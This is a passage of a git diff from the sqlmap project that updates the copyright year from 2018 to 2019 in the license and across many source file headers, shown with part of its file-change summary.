plugins/generic/takeover.py | 2 +- plugins/generic/users.py | 2 +- sqlmap.py | 2 +- sqlmapapi.py | 2 +- tamper/0x2char.py | 2 +- tamper/__init__.py | 2 +- tamper/apostrophemask.py | 2 +- tamper/apostrophenullencode.py | 2 +- 
tamper/appendnullbyte.py | 2 +- tamper/base64encode.py | 2 +- tamper/between.py | 2 +- tamper/bluecoat.py | 2 +- tamper/chardoubleencode.py | 2 +- tamper/charencode.py | 2 +- tamper/charunicodeencode.py | 2 +- tamper/charunicodeescape.py | 2 +- tamper/commalesslimit.py | 2 +- tamper/commalessmid.py | 2 +- tamper/commentbeforeparentheses.py | 2 +- tamper/concat2concatws.py | 2 +- tamper/equaltolike.py | 2 +- tamper/escapequotes.py | 2 +- tamper/greatest.py | 2 +- tamper/halfversionedmorekeywords.py | 2 +- tamper/htmlencode.py | 2 +- tamper/ifnull2casewhenisnull.py | 2 +- tamper/ifnull2ifisnull.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/least.py | 2 +- tamper/lowercase.py | 2 +- tamper/luanginx.py | 2 +- tamper/modsecurityversioned.py | 2 +- tamper/modsecurityzeroversioned.py | 2 +- tamper/multiplespaces.py | 2 +- tamper/overlongutf8.py | 2 +- tamper/overlongutf8more.py | 2 +- tamper/percentage.py | 2 +- tamper/plus2concat.py | 2 +- tamper/plus2fnconcat.py | 2 +- tamper/randomcase.py | 2 +- tamper/randomcomments.py | 2 +- tamper/sp_password.py | 2 +- tamper/space2comment.py | 2 +- tamper/space2dash.py | 2 +- tamper/space2hash.py | 2 +- tamper/space2morecomment.py | 2 +- tamper/space2morehash.py | 2 +- tamper/space2mssqlblank.py | 2 +- tamper/space2mssqlhash.py | 2 +- tamper/space2mysqlblank.py | 2 +- tamper/space2mysqldash.py | 2 +- tamper/space2plus.py | 2 +- tamper/space2randomblank.py | 2 +- tamper/symboliclogical.py | 2 +- tamper/unionalltounion.py | 2 +- tamper/unmagicquotes.py | 2 +- tamper/uppercase.py | 2 +- tamper/varnish.py | 2 +- tamper/versionedkeywords.py | 2 +- tamper/versionedmorekeywords.py | 2 +- tamper/xforwardedfor.py | 2 +- txt/common-columns.txt | 2 +- txt/common-outputs.txt | 2 +- txt/common-tables.txt | 2 +- txt/keywords.txt | 2 +- txt/user-agents.txt | 2 +- waf/360.py | 2 +- waf/__init__.py | 2 +- waf/aesecure.py | 2 +- waf/airlock.py | 2 +- waf/anquanbao.py | 2 +- waf/approach.py | 2 +- waf/armor.py | 2 +- waf/asm.py | 2 +- 
waf/aws.py | 2 +- waf/baidu.py | 2 +- waf/barracuda.py | 2 +- waf/bigip.py | 2 +- waf/binarysec.py | 2 +- waf/blockdos.py | 2 +- waf/bluedon.py | 2 +- waf/chinacache.py | 2 +- waf/ciscoacexml.py | 2 +- waf/cloudbric.py | 2 +- waf/cloudflare.py | 2 +- waf/cloudfront.py | 2 +- waf/comodo.py | 2 +- waf/crawlprotect.py | 2 +- waf/datapower.py | 2 +- waf/denyall.py | 2 +- waf/distil.py | 2 +- waf/dosarrest.py | 2 +- waf/dotdefender.py | 2 +- waf/edgecast.py | 2 +- waf/expressionengine.py | 2 +- waf/fortiweb.py | 2 +- waf/generic.py | 2 +- waf/hyperguard.py | 2 +- waf/incapsula.py | 2 +- waf/isaserver.py | 2 +- waf/jiasule.py | 2 +- waf/knownsec.py | 2 +- waf/kona.py | 2 +- waf/modsecurity.py | 2 +- waf/naxsi.py | 2 +- waf/netcontinuum.py | 2 +- waf/netscaler.py | 2 +- waf/newdefend.py | 2 +- waf/nsfocus.py | 2 +- waf/paloalto.py | 2 +- waf/profense.py | 2 +- waf/proventia.py | 2 +- waf/radware.py | 2 +- waf/reblaze.py | 2 +- waf/requestvalidationmode.py | 2 +- waf/safe3.py | 2 +- waf/safedog.py | 2 +- waf/secureiis.py | 2 +- waf/senginx.py | 2 +- waf/sitelock.py | 2 +- waf/sonicwall.py | 2 +- waf/sophos.py | 2 +- waf/stingray.py | 2 +- waf/sucuri.py | 2 +- waf/tencent.py | 2 +- waf/teros.py | 2 +- waf/trafficshield.py | 2 +- waf/urlscan.py | 2 +- waf/uspses.py | 2 +- waf/varnish.py | 2 +- waf/wallarm.py | 2 +- waf/watchguard.py | 2 +- waf/webappsecure.py | 2 +- waf/webknight.py | 2 +- waf/wordfence.py | 2 +- waf/yundun.py | 2 +- waf/yunsuo.py | 2 +- waf/zenedge.py | 2 +- 357 files changed, 358 insertions(+), 358 deletions(-) diff --git a/LICENSE b/LICENSE index 5fa92b72813..da63e45d6bb 100644 --- a/LICENSE +++ b/LICENSE 
@@ -1,7 +1,7 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2018 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2019 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free diff --git a/extra/__init__.py b/extra/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/beep/beep.py b/extra/beep/beep.py index 521ef2bf1cb..2379222dcb8 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,7 +3,7 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ 
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index cc95e5a992f..79d42dba03b 100644 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,7 +3,7 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 9a27a60b4a2..fa65d448bb7 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,7 +3,7 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/safe2bin/__init__.py +++ b/extra/safe2bin/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py index 19c9784a992..c426c124be5 100644 --- a/extra/safe2bin/safe2bin.py +++ b/extra/safe2bin/safe2bin.py 
@@ -3,7 +3,7 @@ """ safe2bin.py - Simple safe(hex) to binary format converter -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py index 1795299b3de..e56c96cbe5d 100755 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh index 79ab95743ce..53acf30f9a2 100755 --- a/extra/shutils/pycodestyle.sh +++ b/extra/shutils/pycodestyle.sh @@ -1,6 +1,6 @@ #!/bin/bash -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index aa1ad0aab53..c6aa06d0bcf 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh @@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ @@ -61,7 +61,7 @@ cat > sqlmap/__init__.py << EOF #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py index 6d8fb5acd09..9a8ecde597b 100755 --- a/extra/shutils/regressiontest.py 
+++ b/extra/shutils/regressiontest.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission import codecs diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/sqlharvest/__init__.py +++ b/extra/sqlharvest/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py index 7c7aa56ed93..21ec3291cfd 100644 --- a/extra/sqlharvest/sqlharvest.py +++ b/extra/sqlharvest/sqlharvest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/wafdetectify/__init__.py b/extra/wafdetectify/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/extra/wafdetectify/__init__.py +++ b/extra/wafdetectify/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 014854d52cd..3842ad23738 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/__init__.py b/lib/__init__.py index 7181b22a163..c654cbef7f4 100644 
--- a/lib/__init__.py +++ b/lib/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/controller/__init__.py +++ b/lib/controller/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/action.py b/lib/controller/action.py index a4de8dffdc3..933057a5701 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 05bfd6cd93d..63194d46b10 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 7b5ee9ce043..45924c6264f 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 2ff64ea2a07..9fb0cda6e4e 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/__init__.py b/lib/core/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/core/__init__.py +++ b/lib/core/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/agent.py b/lib/core/agent.py index f95e92dddeb..19b6a07b735 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index b99c6f98074..8d816a2dd87 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/common.py b/lib/core/common.py index 502e60fca36..0aa977cc66f 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/convert.py b/lib/core/convert.py index fcd0d277c71..e931d81ecee 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/data.py b/lib/core/data.py index 63cd4e8d971..3a56c7fb4c5 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/datatype.py b/lib/core/datatype.py index 85238cd06f6..079222d1aa8 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/decorators.py b/lib/core/decorators.py index ae3635ca603..3ceaa55c917 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 6c12164a155..95a7f3ff421 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 242599e69af..e80f3d9a033 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/dump.py b/lib/core/dump.py index 444152e8471..6aff9345702 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/enums.py b/lib/core/enums.py index 16125dd1717..fe5706a5512 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/exception.py b/lib/core/exception.py index 2113de86518..ad87adf6f8a 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/log.py b/lib/core/log.py index 6df49f584ef..096fdfd9053 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/option.py b/lib/core/option.py index 85fcd3806fe..27b63e81f30 100644 --- a/lib/core/option.py +++ b/lib/core/option.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 6528e5cf30e..b72cdffe4d4 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/patch.py b/lib/core/patch.py index f55ab7b4a7e..49a458431b5 100644 --- a/lib/core/patch.py +++ b/lib/core/patch.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/profiling.py b/lib/core/profiling.py index def2b2af3c0..44d91bc8ba8 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 2ff8b70c8d2..cccd2af34a4 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/replication.py b/lib/core/replication.py index 764f7664e6a..f9444af7586 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/revision.py b/lib/core/revision.py index eaeac85b9a3..600584de2f2 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/session.py b/lib/core/session.py index 3d0ba367a9a..9cf569b687b 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/settings.py b/lib/core/settings.py index ce19e72a6bd..5f6f1e9e702 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/shell.py b/lib/core/shell.py index d9fb4f59091..6cf7640b335 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index b51a64bba2f..b6fc19cfde4 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/target.py b/lib/core/target.py index 3d99d10e169..af20a002725 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/testing.py b/lib/core/testing.py index ec53aa1de93..2b121bf68ac 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/threads.py b/lib/core/threads.py index 5d8ea0edc81..9c0de76e2e3 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py index 71950f24105..e95378b1575 100644 --- a/lib/core/unescaper.py +++ b/lib/core/unescaper.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/update.py b/lib/core/update.py index e027024e399..814424a37db 100644 --- a/lib/core/update.py +++ b/lib/core/update.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index 77c779a270c..70d93f3338e 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/lib/parse/__init__.py +++ b/lib/parse/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/banner.py b/lib/parse/banner.py index 20d62bab0b0..77ae798f67e 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 9b8ec070478..db86972065e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index d8ae541d65f..c76b7399483 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py 
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/handler.py b/lib/parse/handler.py index 191466a8dbd..b69df9e8175 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 1f42b171761..b348f25b230 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/html.py b/lib/parse/html.py index a7eb7d7ca63..3ec61d52fed 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index 6ea796060a0..1eb13d4984d 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py index 